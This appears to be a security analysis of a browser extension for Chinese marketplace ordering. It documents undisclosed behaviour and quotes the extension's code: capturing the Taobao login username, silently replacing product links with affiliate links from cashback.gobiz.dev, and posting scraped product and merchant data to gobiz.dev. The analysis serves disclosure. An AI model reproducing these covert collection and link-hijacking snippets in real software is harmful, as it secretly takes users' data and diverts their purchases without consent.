Công cụ đặt hàng của nhapsitrungquoc.com

The extension intercepts the Taobao login form, reads the user's account username at the moment of submission, and stores it in chrome.storage.local under 'taobaoLoginUsername'. This credential collection is entirely undisclosed — CWS declares no data collection, the extension description never mentions it, and storing login credentials is not required for the declared purpose of auto-filling shipping addresses or creating Alipay payment requests. The stored value is accessible to any content script the extension later injects.

// On login.taobao.com — polls for presence of #fm-login-id input// Attaches click listener to submit buttondocument.querySelector('.fm-submit').addEventListener('click', function() {  var username = document.querySelector('#fm-login-id').value;  chrome.storage.local.set({    taobaoLoginUsername: username  });});

On every page load across all URLs, the extension collects all anchor hrefs matching Taobao, 1688, Tmall, and yangkeduo product or order URLs, batches them, and sends them via Server-Sent Events POST to cashback.gobiz.dev with the tenant identifier 'shippo-cb'. The server returns replacement URLs which are silently written back into the DOM, replacing every matched link before the user clicks. This is affiliate link hijacking: user purchases are invisibly routed through gobiz's cashback affiliate system without any disclosure, opt-in, or user-visible indication that their links have been modified.

window.addEventListener("load", (function() {  var t = window.location.href;  t.match(/order.1688.com\/order\/smart_make_order.htm/) || t.match(    /buy.tmall.com\/order\/confirm_order/) || t.match(/buy.tmall.hk\/order\/confirm_order/) || t.match(    /buy.taobao.com\/auction\//) || o()((function() {    // Collects all <a> tags whose href matches Taobao/1688/Tmall/yangkeduo product/order URLs    var i = new E("https://cashback.gobiz.dev/public/kui/shorten/generate_batch", {      headers: {        "Content-Type": "application/json",        "X-Tenant": "shippo-cb"      },      payload: a()(n),      method: "POST"    });    i.addEventListener("generate-batch-event", (function(t) {      var r = JSON.parse(t.data);      if (r.url) {        var n, e = document.getElementById(r.requestId);        e && (e.href = f()(n = r.url).call(n, "https://") < 0 ? "https://" + r.url : r.url)      }    })), i.stream()  }), 1e3)}))

Five seconds after every product page load across six marketplaces, the extension scrapes the complete product record — name, price, all SKU variants, current stock, total sales count, merchant identity and ratings, product images, and the canonical URL — and POSTs it to cashback.gobiz.dev/ingester/products tagged as collector type 'gobiz-linga'. This is systematic commercial product intelligence harvesting feeding a third-party database. CWS declares no data collection, so this behavior has no disclosure basis and occurs entirely without user awareness or consent.

// Module 750 — runs on 1688, Taobao, Tmall, Shopee, BigC, Lazada, lala.best product pageswindow.addEventListener("load", (function() {  setTimeout((function() {    var t = a.getProductDetailInfo();    // t = { name, oid, salePrice, merchant: { oid, name, url, ratings },    //        skus, stock, totalSold, images, url, marketplace, brand }    // annotated: collector.type = "gobiz-linga"    n.default.post("https://cashback.gobiz.dev/ingester/products", [t])  }), 5e3)}))

On every merchant/shop page across supported marketplaces, the extension scrapes the full seller profile — including company name, physical address, registration ID, contact details, aggregated ratings, and total sales — and POSTs it to cashback.gobiz.dev/ingester/merchants five seconds after page load. Like the product scraper, this is undisclosed merchant intelligence collection building a commercial database at gobiz.dev. No user action triggers it; it fires silently on every shop page visit.

var i = r(402).ShopSpiderFactory.make(window.location.href);window.addEventListener("load", (function() {  setTimeout((function() {    var t = i.getShopInfo();    // t = full merchant profile: company name, logo, address, ratings,    //     total sold, company registration ID, store links, contact details    n.default.post("https://cashback.gobiz.dev/ingester/merchants", t)  }), 5e3)}))